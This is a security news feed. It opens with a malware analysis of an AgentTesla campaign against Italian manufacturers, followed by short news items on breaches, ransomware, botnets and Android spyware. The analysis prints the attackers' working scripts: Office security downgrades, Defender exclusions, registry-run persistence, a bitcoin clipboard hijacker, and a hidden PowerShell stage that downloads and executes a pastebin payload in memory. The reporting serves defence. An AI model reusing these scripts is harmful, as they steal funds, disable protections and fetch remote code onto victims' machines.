“HKCU\Software\Microsoft\Office\16.0\Publisher\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\Publisher\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\Publisher\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\Word\Options\DontUpdateLinks”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\Word\Options\DontUpdateLinks”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\Word\Options\DontUpdateLinks”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\Word\Options\DontUpdateLinks”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\Word\Options\DontUpdateLinks”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\PowerPoint\Options\DontUpdateLinks”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\PowerPoint\Options\DontUpdateLinks”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\PowerPoint\Options\DontUpdateLinks”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\PowerPoint\Options\DontUpdateLinks”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\PowerPoint\Options\DontUpdateLinks”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\Excel\Options\DontUpdateLinks”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\Excel\Options\DontUpdateLinks”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\Excel\Options\DontUpdateLinks”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\Excel\Options\DontUpdateLinks”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\Excel\Options\DontUpdateLinks”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\Word\Security\AllowDDE”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\Word\Security\AllowDDE”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\Word\Security\AllowDDE”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\Word\Security\AllowDDE”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\Word\Security\AllowDDE”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\AllowDDE”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\AllowDDE”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\AllowDDE”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\AllowDDE”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\AllowDDE”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\Excel\Security\AllowDDE”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\Excel\Security\AllowDDE”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\Excel\Security\AllowDDE”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\Excel\Security\AllowDDE”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\Excel\Security\AllowDDE”, 1, “REG_DWORD”

Code Snippet 5

As seen in the code a powershell command is hidden inside the variable named $cici, which is immediately converted from the decimal to the relative ascii value. 

$userPath = $env:USERPROFILE$pathExclusions = New-Object System.Collections.ArrayList$processExclusions = New-Object System.Collections.ArrayList$pathExclusions.Add(‘C:\’) > $null$processExclusions.Add(‘Msbuild.exe’) > $null$processExclusions.Add(‘Calc.exe’) > $null$processExclusions.Add(‘powershell.exe’) > $null$processExclusions.Add(‘wscript.exe’) > $null$processExclusions.Add(‘mshta.exe’) > $null$processExclusions.Add(‘cmd.exe’) > $null$projectsFolder = ‘d:\’Add-MpPreference -ExclusionPath $projectsFolderforeach ($exclusion in $pathExclusions){    Write-Host “Adding Path Exclusion: ” $exclusion    Add-MpPreference -ExclusionPath $exclusion}foreach ($exclusion in $processExclusions){    Write-Host “Adding Process Exclusion: ” $exclusion    Add-MpPreference -ExclusionProcess $exclusion}Write-Host “”Write-Host “Your Exclusions:”$prefs = Get-MpPreference$prefs.ExclusionPath$prefs.ExclusionProcess

Code snippet 6

In Code Snippet 6 we found a powershell code instructed to insert in the Microsoft Windows Anti-Malware exclusions the following processes: msbuild, calc, powershell, wscript, mshta and cmd.

Another script in this intricated chain is YL0je2fU:

<script language=”&#86;&#66;&#83;&#99;&#114;&#105;&#112;&#116;”>
CreateObject(“WScript.Shell”).RegWrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Run\replcia”, “mshta vbscript:Execute(“”CreateObject(“”””Wscript.Shell””””).Run “”””powershell ((gp HKCU:\Software).mogale)|IEX””””, 0 : window.close””)”, “REG_SZ”

CreateObject(“Wscript.Shell”).regwrite “HKCU\Software\mogale”, “$cici=@(102,117,110,99,116,105,111,110,32,105,115,66,105,116,99,111,105,110,65,100,100,114,101,115,115,40,91,115,116,114,105,110,103,93,36,99,108,105,112,98,111,97,114,100,67,111,110,116,101,110,116,41,10,123,10,9,105,102,40,36,99,108,105,112,98,111,97,114,100,67,111,110,116,101,110,116,91,48,93,32,45,110,101,32,39,49,39,41,10,9,123,10,9,9,114,101,116,117,114,110,32,36,102,97,108,115,101,10,9,125,10,10,9,36,115,116,114,76,101,110,103,116,104,32,61,32,36,99,108,105,112,98,111,97,114,100,67,111,110,116,101,110,116,46,108,101,110,103,116,104,10,9,105,102,40,36,115,116,114,76,101,110,103,116,104,32,45,108,116,32,50,54,32,45,111,114,32,36,115,116,114,76,101,110,103,116,104,32,45,103,116,32,51,53,41,10,9,123,10,9,9,114,101,116,117,114,110,32,36,102,97,108,115,101,10,9,125,10,10,9,36,118,97,108,105,100,82,101,103,101,120,32,61,32,39,94,91,97,45,122,65,45,90,48,45,57,92,115,93,43,36,39,10,9,105,102,40,36,99,108,105,112,98,111,97,114,100,67,111,110,116,101,110,116,32,45,99,110,111,116,109,97,116,99,104,32,36,118,97,108,105,100,82,101,103,101,120,41,10,9,123,10,9,9,114,101,116,117,114,110,32,36,102,97,108,115,101,10,9,125,10,10,9,114,101,116,117,114,110,32,36,116,114,117,101,10,125,10,36,98,105,116,99,111,105,110,65,100,100,114,101,115,115,101,115,32,61,32,40,34,49,57,107,67,99,100,98,116,116,84,65,88,49,109,76,85,51,72,107,57,83,50,66,87,53,99,75,76,70,68,49,122,49,87,34,44,32,34,49,57,107,67,99,100,98,116,116,84,65,88,49,109,76,85,51,72,107,57,83,50,66,87,53,99,75,76,70,68,49,122,49,87,34,44,32,34,49,57,107,67,99,100,98,116,116,84,65,88,49,109,76,85,51,72,107,57,83,50,66,87,53,99,75,76,70,68,49,122,49,87,34,44,32,34,49,57,107,67,99,100,98,116,116,84,65,88,49,109,76,85,51,72,107,57,83,50,66,87,53,99,75,76,70,68,49,122,49,87,34,44,32,34,49,57,107,67,99,100,98,116,116,84,65,88,49,109,76,85,51,72,107,57,83,50,66,87,53,99,75,76,70,68,49,122,49,87,34,41,10,36,98,105,116,99,111,105,110,65,100,100,114,101,115,115,101,115,83,105,122,101,32,61,32,36,98,105,116,99,111,105,110,65,100,100,114,101,115,115,101,115,46,108,101,110,103,116,104,10,36,105,32,61,32,48,10,36,111,108,100,65,100,100,114,101,115,115,83,101,116,32,61,32,34,34,10,119,104,105,108,101,40,49,41,10,123,10,9,36,99,108,105,112,98,111,97,114,100,67,111,110,116,101,110,116,32,61,32,71,101,116,45,67,108,105,112,98,111,97,114,100,10,9,105,102,40,40,105,115,66,105,116,99,111,105,110,65,100,100,114,101,115,115,40,36,99,108,105,112,98,111,97,114,100,67,111,110,116,101,110,116,41,41,32,45,99,101,113,32,36,116,114,117,101,32,45,97,110,100,10,9,9,36,99,108,105,112,98,111,97,114,100,67,111,110,116,101,110,116,32,45,99,110,101,32,36,111,108,100,65,100,100,114,101,115,115,83,101,116,41,10,9,123,10,9,9,83,101,116,45,67,108,105,112,98,111,97,114,100,32,36,98,105,116,99,111,105,110,65,100,100,114,101,115,115,101,115,91,36,105,93,10,9,9,36,111,108,100,65,100,100,114,101,115,115,83,101,116,32,61,32,36,98,105,116,99,111,105,110,65,100,100,114,101,115,115,101,115,91,36,105,93,10,9,9,36,105,32,61,32,40,36,105,32,43,32,49,41,32,37,32,36,98,105,116,99,111,105,110,65,100,100,114,101,115,115,101,115,83,105,122,101,10,9,125,10,125);[System.Text.Encoding]::ASCII.GetString($cici)|IEX” , “REG_SZ”
Const HIDDEN_WINDOW = 0strComputer = “.”Set objWMIService = GetObject(“winmgmts:” & “{impersonationLevel=impersonate}!\\” & strComputer & “\root\cimv2”)Set objStartup = objWMIService.Get(“Win32_ProcessStartup”)Set objConfig = objStartup.SpawnInstance_objConfig.ShowWindow = HIDDEN_WINDOWSet objProcess = GetObject(“winmgmts:root\cimv2:Win32_Process”)errReturn = objProcess.Create( “powershell.exe ((gp HKCU:\Software).mogale)|IEX”, null, objConfig, intProcessID)
self.close
</script>

Code Snippet 7

Even in this case there is a powershell script embedded in it using the same variable name “$cici”, but with the following body:

function isBitcoinAddress([string]$clipboardContent){ if($clipboardContent[0] -ne ‘1’) { return $false }
$strLength = $clipboardContent.length if($strLength -lt 26 -or $strLength -gt 35) { return $false }
$validRegex = ‘^[a-zA-Z0-9\s]+$’ if($clipboardContent -cnotmatch $validRegex) { return $false }
return $true}$bitcoinAddresses = (“19kCcdbttTAX1mLU3Hk9S2BW5cKLFD1z1W”, “19kCcdbttTAX1mLU3Hk9S2BW5cKLFD1z1W”, “19kCcdbttTAX1mLU3Hk9S2BW5cKLFD1z1W”, “19kCcdbttTAX1mLU3Hk9S2BW5cKLFD1z1W”, “19kCcdbttTAX1mLU3Hk9S2BW5cKLFD1z1W”)$bitcoinAddressesSize = $bitcoinAddresses.length$i = 0$oldAddressSet = “”while(1){ $clipboardContent = Get-Clipboard if((isBitcoinAddress($clipboardContent)) -ceq $true -and $clipboardContent -cne $oldAddressSet) { Set-Clipboard $bitcoinAddresses[$i] $oldAddressSet = $bitcoinAddresses[$i] $i = ($i + 1) % $bitcoinAddressesSize }}

Code Snippet 8

The script performs a constant check in the clipboard of the victim machine, looking for bitcoin addresses and some of them are also hardcoded. The last stage is UyFaSxgj:

<script language=”&#86;&#66;&#83;&#99;&#114;&#105;&#112;&#116;”>Const HIDDEN_WINDOW = 0strComputer = “.”Set objWMIService = GetObject(“winmgmts:” & “{impersonationLevel=impersonate}!\\” & strComputer & “\root\cimv2”)Set objStartup = objWMIService.Get(“Win32_ProcessStartup”)Set objConfig = objStartup.SpawnInstance_objConfig.ShowWindow = HIDDEN_WINDOWSet objProcess = GetObject(“winmgmts:root\cimv2:Win32_Process”)errReturn = objProcess.Create( “powershell.exe -nologo -WindowStyle Hidden $_Xpin = ((New-Object Net.WebClient).DowNloAdSTRiNg(‘h’+’t’+’t’+’p’+’s’+’:’+’/’+’/’+’p’+’a’+’s’+’t’+’e’+’b’+’i’+’n’+’.’+’c’+’o’+’m’+’/’+’r’+’a’+’w’+’/eyGv9x4B’));$_Xpin=$_Xpin.replace(‘.’,’*!(@*#(!@#*’).replace(‘*!(@*#(!@#*’,’0′);$_Xpin = $_Xpin.ToCharArray();[Array]::Reverse($_Xpin);[byte[]]$_PMP = [System.Convert]::FromBase64String($_Xpin);$_1 = [System.Threading.Thread]::GetDomain().Load($_PMP);$_1.EntryPoint.invoke($S,$X)”, null, objConfig, intProcessID)
self.close
</script>

Code Snippet 9

This component spawn through powershell a script a binary file from a pastebin, eyGv9x4B, but, unfortunately, at the time of analysis, the paste has been removed.

This example could suggest to us the power of the malicious infrastructure built from the attacker, where  components could be removed or replaced with another one in every moment.

The Payload

As previously stated, the final payload is AgentTesla. It remains one of the most adopted commodity malware instructed to steal a large number of sensitive information about the victim. During the past years, we constantly studied the evolution of this threat and we enumerated all the sensitive data grasped by it. 

However, also in this case, we obtained the final payload and the configuration of the SMTP client where sends the stolen information:

Figure 13: Configuration of the AgentTesla SMTP client

The domain “atn-com.pw” has been created ad-hoc in order to manage the infection campaign. Studying the uptime of the domain we were able to reconstruct the infection campaign of the threat actor.


Figure 14: Information about the C2 uptime stats

As shown above, the domain has been registered on the last days of january and it has been active since the middle of April. After a short period of inactivity, it compared another time the 2nd of May since these days.

Conclusion

The actor hiding behind this campaign can undoubtedly be considered a persistent cyber-threat to many organizations operating in production sectors in Europe and, in the last months, also in Italy. Its intricate infection chain developed and tested during the years gave him the flexibility needed to bypass many layers of traditional security defences, manipulating the delivery infrastructure from time to time.

During the time, the actor’s delivery infrastructure was leveraged to install different kinds of malware: most of the time remote access trojans and info and credential stealing software. Such malware types are capable of enabling cyber-espionage and IP theft operations, potentially to re-sell stolen information on dark markets.

No doubt, we will keep going to track this threat.

Additional details, including IoCs and Yara rules are available here:

Pierluigi Paganini

(SecurityAffairs – Italian manufacturing, hacking)

The post Cyber-Criminal espionage Operation insists on Italian Manufacturing appeared first on Security Affairs.

Microsoft warns of “massive campaign” using COVID-19 themed emails

Experts from the Microsoft Security Intelligence team provided some details on a new “massive campaign” using COVID-19 themed emails.

Researchers from the Microsoft Security Intelligence team provided some details on a new massive phishing campaign using COVID-19 themed emails.

The messages used weaponized Excel documents, the IT giant observed a spike in the number of malicious documents in malspam campaigns which use Excel 4.0 macros.

“For several months now, we’ve been seeing a steady increase in the use of malicious Excel 4.0 macros in malware campaigns. In April, these Excel 4.0 campaigns jumped on the bandwagon and started using COVID-19 themed lures.” states Microsoft in a Tweet.

The latest COVID-19 campaign began in April, the messages purport to be from the Johns Hopkins Center and use an Excel attachment. Once opened the attachment, it will show a graph of Coronavirus cases in the United States and trick the victims into enabling the macros to start the infection.

The macros drop a remote access tool (RAT) named NetSupport Manager, it is a legitimate application that is abused by attackers to take control over victim systems.

“The hundreds of unique Excel files in this campaign use highly obfuscated formulas, but all of them connect to the same URL to download the payload. NetSupport Manager is known for being abused by attackers to gain remote access to and run commands on compromised machines.” continues Microsoft.

The NetSupport RAT employed in this COVID-19-themed campaign also drops multiple components, including several .dll, .ini, and other .exe files, a VBScript, and an obfuscated PowerSploit-based PowerShell script. Then it connects to a command and control server, allowing threat actors to send further commands.

Below the Indicators of Compromise (IoCs) shared by Microsoft:

Below a list or recommendations to avoid this threat:

  • Keep your anti-virus software up to date.
  • Search for existing signs of the threat using IoCs in your environment.
  • Keep applications and operating systems running and up to date.
  • Be vigilant with attachments and links in emails.

Pierluigi Paganini

(SecurityAffairs – COVID-19, hacking)

The post Microsoft warns of “massive campaign” using COVID-19 themed emails appeared first on Security Affairs.

Security Service of Ukraine arrested the popular hacker Sanix who sold billions of stolen credentials

The Ukrainian Secret Service (SSU) has arrested a hacker known as Sanix, who was selling billions of stolen credentials on hacking forums and Telegram channels.

The popular hacker Sanix has been arrested by the Ukrainian Secret Service (SSU). The man is known in the cybercrime underground for selling billions of stolen credentials. The officials did not disclose the man of the cybercriminals, they only said that the man has been arrested in Ivano-Frankivsk, Ukraine.

“The Security Service of Ukraine has identified and detained a hacker known as Sanix. Early last year, it caught the attention of global cybersecurity experts by posting on one of the forums the sale of a database with 773 million e-mail addresses and 21 million unique passwords.” reads a press release published by the SSU.

“SBU cyber specialists recorded the sale of databases with logins and passwords to e-mail boxes, PIN codes for bank cards, e-wallets of cryptocurrencies, PayPal accounts, information about computers hacked for further use in botnets and for organizing DDoS attacks”

The man was known for aggregating data, including users’ credentials, in lists that were offered for sale via Telegram (where he used the nickname Sanixer) or in hacking forums.

Sanix was identified by the investigator Brian Krebs as the source of Collection 1 in January 2019. Some of the most popular collections sold in the past by the same hacker are known as Collection #1, #2, #3, #4, #5, Antipublic, and others.

Collection #1

Sanix has been active on the cybercrime underground at least since 2018, he focuses in the sale of stolen data from organizations.

It has been estimated that the man amassed billions of unique username-password combinations.

Stolen credentials were bought by fraudsters, hackers, and scammers to carry out a broad range of malicious activities, such as launching malspam campaign or take over users’ accounts.

During searches at his residence, SSU officers seized computer equipment containing two terabytes of stolen information, phones with evidence of illegal activities and cash from illegal transactions in the amount of almost 190,000 Ukrainian hryvnias (roughly $7,000) and more than $3000.

Pierluigi Paganini

(SecurityAffairs – Sanix, hacking)

The post Security Service of Ukraine arrested the popular hacker Sanix who sold billions of stolen credentials appeared first on Security Affairs.

Easyjet hacked: 9 million customer’s data exposed along with 2,200+ credit card details

British airline EasyJet announced it was the victim of a “highly sophisticated” cyber attack that exposed email addresses and travel details of around 9 million of its customers.

British airline EasyJet announced that a “highly sophisticated” cyber-attack exposed email addresses and travel details of around 9 million of its customers.

“Following discussions with the Information Commissioner’s Office (“ICO”), the Board of easyJet announces that it has been the target of an attack from a highly sophisticated source.” reads a statement from the company. “Our investigation found that the email address and travel details of approximately 9 million customers were accessed.” 

According to the company, hackers also accessed a small subset of customers and obtained credit card details for 2,208 of them, no passport details were exposed.

“Our forensic investigation found that, for a very small subset of customers (2,208), credit card details were accessed.” continues the company.

At the time of writing the airline did not disclose details of the security breach, it is not clear when the incident took place and how EasyJet discovered the intrusion.


EasyJet conducted a forensic investigation and once identifies the unauthorized access has locked it.

The airline reported the incident to the Information Commissioner’s Office (“ICO”), the good news is that the company is not aware of any attack in the wild that abused the stolen information.

EasyJet is still investigating the security breach.

“We take the cybersecurity of our systems very seriously and have robust security measures in place to protect our customers’ personal information. However, this is an evolving threat as cyber attackers get ever more sophisticated,” says EasyJet Chief Executive Officer Johan Lundgren.

“Since we became aware of the incident, it has become clear that owing to COVID-19, there is heightened concern about personal data being used for online scams. Every business must continue to stay agile to stay ahead of the threat.”

The airline has started notifying the incident to all the impacted customers and is recommending them to be “extra vigilant, particularly if they receive unsolicited communications.”

According to the Reuters that cited two people familiar with the investigation, hacking tools and techniques used by attackers point to a group of suspected Chinese hackers that targeted multiple airlines in recent months.

Pierluigi Paganini

(SecurityAffairs – EasyJet, hacking)

The post Easyjet hacked: 9 million customer’s data exposed along with 2,200+ credit card details appeared first on Security Affairs.

Australian product steel producer BlueScope hit by cyberattack

The Australian flat product steel producer BlueScope Steel Limited was hit by a cyberattack that caused disruptions to some of its operations.

Australian steel producer BlueScope was recently hit by a cyberattack that disrupted some of its operations.

The incident was spotted on Friday at one of its businesses located in the US, but the company did not share any detail about the attack.

“BlueScope today confirmed that its IT systems have been affected by a cyber incident, causing disruptions to parts of the Company’s operations. Our North Star, Asian and New Zealand businesses are continuing largely unaffected with minor disruptions.” reads the statement published by the company. “In Australia, manufacturing and sales operations have been impacted; some processes have been paused, whilst other processes including steel despatches continue with some manual processes and workarounds.”

The problems faced by the company are usually the result of a ransomware attack, the suspect is confirmed by iTnews that said the incident was caused by this family of malware and that is restoring systems from backups.

“BlueScope Steel is suffering IT “disruption” that is believed to be the result of a ransomware infection, impacting production systems used by its global operations.” reads a post published by iTnews. “iTnews has learned that production systems were halted company-wide in the early hours of Thursday morning, though recovery from backup was understood to be progressing on Thursday afternoon.”

BlueScope confirmed that the security incident impacted some of its IT systems. Manufacturing and sales operations in Australia were deeply impacted.

“In the affected areas the Company has reverted to manual operations where possible while it fully assesses the impact and remediates as required, in order to return to normal operations as quickly as possible.” continues the post.

Recently another Australian giant was hit by ransomware, the transportation and logistics giant Toll disclosed a security incident.

In May, Toll Group informed its customers that it has shut down some IT systems after a new ransomware attack, it is the second infection disclosed by the company this year.

Toll staff discovered the infection after noticing unusual activity on some servers, further investigation revealed the presence of the Nefilim ransomware.

Pierluigi Paganini

(SecurityAffairs – BlueScope, hacking)

The post Australian product steel producer BlueScope hit by cyberattack appeared first on Security Affairs.

Hackers Target Oil Producers During COVID-19 Slump

Recent research shows that the oil industry — already experiencing difficulties due to COVID-19 — must remain abreast of threats to stay safe from hackers.

Spear-phishing is a rapidly emerging threat. It’s more specific than generic phishing attempts and often targets a single person or company. Recent research shows that the oil industry — already experiencing difficulties due to COVID-19 — must remain abreast of threats to stay safe from hackers. 

Cybercriminals Capitalizing on the Chaos

The coronavirus is forcing companies in most industries to operate substantially differently. Many may find it takes time to adjust to the changes. Others do not immediately have the resources for a major shift, such as having all employees work remotely. 

A related concern is that COVID-19 is both a new and anxiety-inducing issue. People want to learn as much as they can about it, and their haste may result in them clicking on links without thinking. Cybercriminals view these conditions as ideal for orchestrating their attacks. Data from Barracuda cybersecurity researchers identified a 667% increase in spear-phishing attacks between the end of February and the following month. 

Real-Life Examples of Spear-Phishing Attacks in the Energy Production Sector

The threat of spear-phishing for energy companies is, unfortunately, not a theoretical one. Coverage published in late April by Bitdefender illuminated a carefully executed attack. The research team found evidence of a campaign occurring March 31, whereby hackers impersonated a well-known engineering company with experience in on- and off-shore energy projects. 

The messages — which did not include many of the telltale signs of phishing like spelling and grammatical errors — asked recipients to submit equipment and materials bids for the Rosetta Sharing Facilities Project. Participants would do so on behalf of Burullus, a gas joint venture partially owned by another Egyptian state oil brand. 

The emails also contained two attachments, which were supposedly bid-related forms. Downloading them infected a user’s system with a type of trojan spyware not previously seen in other utilities industry cyberattacks. The effort targeted oil companies all over the world, from Malaysia to South Africa, in a single day. 

Bitdefender’s research team also uncovered a more geographically specific spear-phishing attempt to target the gas sector on April 12. It centered on a relatively small number of shipping companies based in the Philippines. The emails asked them to send details associated with an oil tanker vessel and contained industry-specific language. This spear-phishing campaign occurred over two days. 

The cybersecurity experts that studied these attacks stressed that, since the messages contained accurate details about real-life companies and events associated with the oil industry, the attackers took the time to research to craft maximally convincing content. 

Hackers Love Causing Severe Disruptions

Why are cyberattacks in the energy industry suddenly on the rise? One reason may stem from the way hackers often deploy tactics to cause tremendous harm to necessary services. The oil industry operates on a vast scale. For example, a company specializing in oil and gas exploration planned as much as 300,000 feet of total footage for drilling in one region during 2018. 

The ability to get such impressive outcomes undoubtedly helps oil companies. The increased scale also may make it more necessary to safeguard against cyberattacks, especially as criminals look for ways to cause the most damage. Another recent incident, announced in a United States government alert on February 18, shut down a natural gas compression facility. Operations stopped for two days, causing losses in productivity and revenue. 

Although the publication did not name the energy company, it mentioned that the hackers depended on spear-phishing to get the credentials necessary for entering the businesses’ information technology (IT) network. It then used that access to wreak havoc on the enterprise’s operational technology infrastructure. 

Not a New Concern

Utilities industry cyberattacks have long worried cybersecurity analysts. If concentrated efforts from hackers shut down the electric grid, the effects could be long-lasting and hit virtually every industry and consumer in the affected areas. The risks to the energy sector began before the coronavirus pandemic, too. 

In November 2019, cybersecurity publications discussed a ransomware attack on Petróleos Mexicanos, Mexico’s largest oil and gas company. The perpetrators asked for 562 bitcoins to restore the data. The affected enterprise did not comply, and it had important data backed up. 

Toll Group, an Australian transportation and logistics company with oil and gas companies as clients, suffered a ransomware attack this spring. It was the second such issue in four months, with the first happening in February. 

The Energy Industry Must Remain Vigilant

The challenges posed by COVID-19 and its effect on oil prices may make the respective parties feel the impacts of cyberattacks in the energy industry more acutely. An ideal aim is to prevent those events rather than dealing with the damage afterward. Paying attention to cybersecurity vulnerabilities can help companies make meaningful gains and stay protected.

About the author

Kayla Matthews is a technology and cybersecurity writer, and the owner of ProductivityBytes.com. To learn more about Kayla and her recent projects, visit her About Me page.

Pierluigi Paganini

(SecurityAffairs – COVID-19, hacking)

The post Hackers Target Oil Producers During COVID-19 Slump appeared first on Security Affairs.

Both Mirai and Hoaxcalls IoT botnets target Symantec Web Gateways

Experts from Palo Alto Networks discovered that the Mirai and Hoaxcalls botnets are targeting a vulnerability in legacy Symantec Web Gateways.

Palo Alto Networks Unit 42 researchers observed both the Mirai and Hoaxcalls botnets using an exploit for a post-authentication Remote Code Execution vulnerability in legacy Symantec Web Gateways 5.0.2.8.

“I recently came across new Hoaxcalls and Mirai botnet campaigns targeting a post-authentication Remote Code Execution vulnerability in Symantec Secure Web Gateway 5.0.2.8, which is a product that became end-of-life (EOL) in 2015 and end-of-support-life (EOSL) in 2019.” reads the analysis published by Palo Alto Networks. “There is no evidence to support any other firmware versions are vulnerable at this point in time and these findings have been shared with Symantec.”

Symantec pointed out that the flaw has been fixed in Symantec Web Gateway 5.2.8 and that it doesn’t affect Secure Web Gateway solutions, such as ProxySG and Web Security Services.

Experts first observed the exploitation of the flaw in the wild on April 24, 2020, as part of an evolution of the Hoaxcalls botnet that was first discovered early of April. The botnet borrows the code from Tsunami and Gafgyt botnets, it expanded the list of targeted devices and added new distributed denial of service (DDoS) capabilities.

Operators behind the Hoaxcalls botnet started using the exploit a few days after the publication of the vulnerability details.

Hoaxcalls update-URL

In the first week of May, the experts also spotted a Mirai variant using the same exploit, but this samples don’t contain any DDoS capabilities.

“they serve the purpose of propagation using credential brute force and exploitation of the Symantec Secure Web Gateway RCE vulnerability This blog post provides any noteworthy technical details on these two campaigns.” continues the report.

According to Unit 42, both the Mirai and Hoaxcalls botnets used payloads designed to discover and infect vulnerable devices. In the case of Mirai, the bot is able to propagate via either credential brute-forcing or exploitation of the Symantec Web Gateways exploit.

Experts note that the exploit is only effective for authenticated sessions and the affected devices are End of Life (EOL) from 2012.

“In the case of both campaigns, one can assume that their success with this exploit is limited by the post-authentication nature of the Symantec Secure Web Gateway RCE vulnerability.” concludes Palo Alto Networks.

The report published by Palo Alto Networks contains technical details about the botnet, including the Indicators of Compromise (IoCs)

Pierluigi Paganini

(SecurityAffairs – Symantec Web Gateways, hacking)

The post Both Mirai and Hoaxcalls IoT botnets target Symantec Web Gateways appeared first on Security Affairs.

129 million records of Russian car owners available on the dark web

A hacker is offering for sale on a dark web forum a database containing 129 million records of car owners in Moscow.

A hacker is attempting to sell on a dark web forum a database containing 129 million records of car owners in Moscow.

As a proof of the authenticity of the data, the hacker has leaked some anonymized data containing all the car details present in the traffic police registry.

The archive doesn’t include car owners’ details, exposed data includes the car’s make and model, place of registration, and the date of first and last registration.

The seller is offering the full version of the database for 0.3 BTC, which at the current rate is about $ 2677, paying 1.5 BTC ($ 13.386) it is possible to purchase information for “exclusive use.”

The accuracy of the data has been verified by Vedomosti media.

“Hackers posted a darknet database of Russian car owners, it includes 129 million positions from the traffic police registry. The authenticity of the information was confirmed by an employee of the car-sharing company, Vedomosti reports.” reads the website rbc.ru.

“In the published data there is only anonymized information. These include: place and date of registration of the car, make and model. According to hackers, the full version also contains the name, address, date of birth, passport numbers of car owners and their contact information.”

According to the Russian blog Nora the Hedgehog, several portals where people can pay fines for violating COVID-19 quarantine are leaking their full names and passport numbers by simply providing the registration number of the ticket.

The worst news is that the portals don’t implement any protection against brute-force attacks, allowing attackers to try all the possible combinations of unique ticket numbers to retrieve personal details of the people that paid the fines.

Pierluigi Paganini

(SecurityAffairs – dark web, hacking)

The post 129 million records of Russian car owners available on the dark web appeared first on Security Affairs.

Texas Department of Transportation (TxDOT) hit by a ransomware attack

A new ransomware attack hit the Texas government, the malware this time infected systems at the state’s Department of Transportation (TxDOT).

The Texas government suffered two ransomware attacks in a few weeks, the first one took place on May 8, 2020 and infected systems at the Texas court.

Now ransomware has infected malware the systems at the state’s Department of Transportation (TxDOT), that attack forced the administrators to shut down the systems to avoid the propagation of the ransomware.

The state’s Department of Transportation (TxDOT) discovered the second attack on May 14, the infection follows an unauthorized access to the Department’s network.

“The Texas Department of Transportation determined that on May 14, 2020, there was unauthorized access to the agency’s network in a ransomware event” states the TxDOT.

The agency immediately took steps to prevent further damages and isolated impacted systems, it “working to ensure critical operations continue during this interruption.”

The agency reported the incident to local authorities and is investigating into the incident with the help of the FBI.

At the time of writing it is not clear if the two attacks are connected, there are no technical details about both incidents either if the attackers have stolen any data.

In August 2019, Texas was hit by a wave of ransomware attacks that are targeting local governments.

At least 23 local government organizations were impacted by the ransomware attacks, the Department of Information Resources (DIR) is currently investigating them and providing supports to mitigate the attacks.

Pierluigi Paganini

(SecurityAffairs – TxDOT, hacking)

The post Texas Department of Transportation (TxDOT) hit by a ransomware attack appeared first on Security Affairs.

Mandrake, a high sophisticated Android spyware used in targeted attacks

Security experts discovered a highly sophisticated Android spyware platform, dubbed Mandrake, that remained undetected for four years.

Researchers from Bitdefender discovered a high-sophisticated Android spyware platform dubbed Mandrake, it was involved in highly targeted attacks against specific devices. Mandrake is an advanced cyberespionage platform, but experts believe the attacks are financially motivated.

Threat actors behind this campaign managed to fly under the radar for as long as possible. Attackers carefully selected the devices to infect and avoid compromise devices in countries that are of interest to them.

“Mandrake stood in the shadow for at least 4 years. During this time, it stole data from at least tens of thousands of users.” reads the report published by Bitdefender. “It takes special care not to infect everyone” – This is exactly what the actor did and most likely why it remained under the radar for 4 full years. Because of this strategy, the actual number of infections we were able to trace is quite low; Google Play Apps used as droppers to infect targets have only hundreds or – in some cases – thousands of downloads. It might even be possible that some of the infected users won’t face an attack at all if they present no interest to the actor.”

Most of the infections are in Australia, followed in Europe, America, and Canada. Experts observed two different waves of attacks, a first one in 2016 and 2017.

Experts detected seven malicious applications delivering Mandrake in Google Play alone, namely Abfix, CoinCast, SnapTune Vid, Currency XE Converter, Office Scanner, Horoskope, and Car News.

Mandrake

Sinkholing performed by the experts revealed about 1,000 victims during a 3-week period. The researchers estimated that the tens of thousands, and probably hundreds of thousands, were infected in the last 4 years.

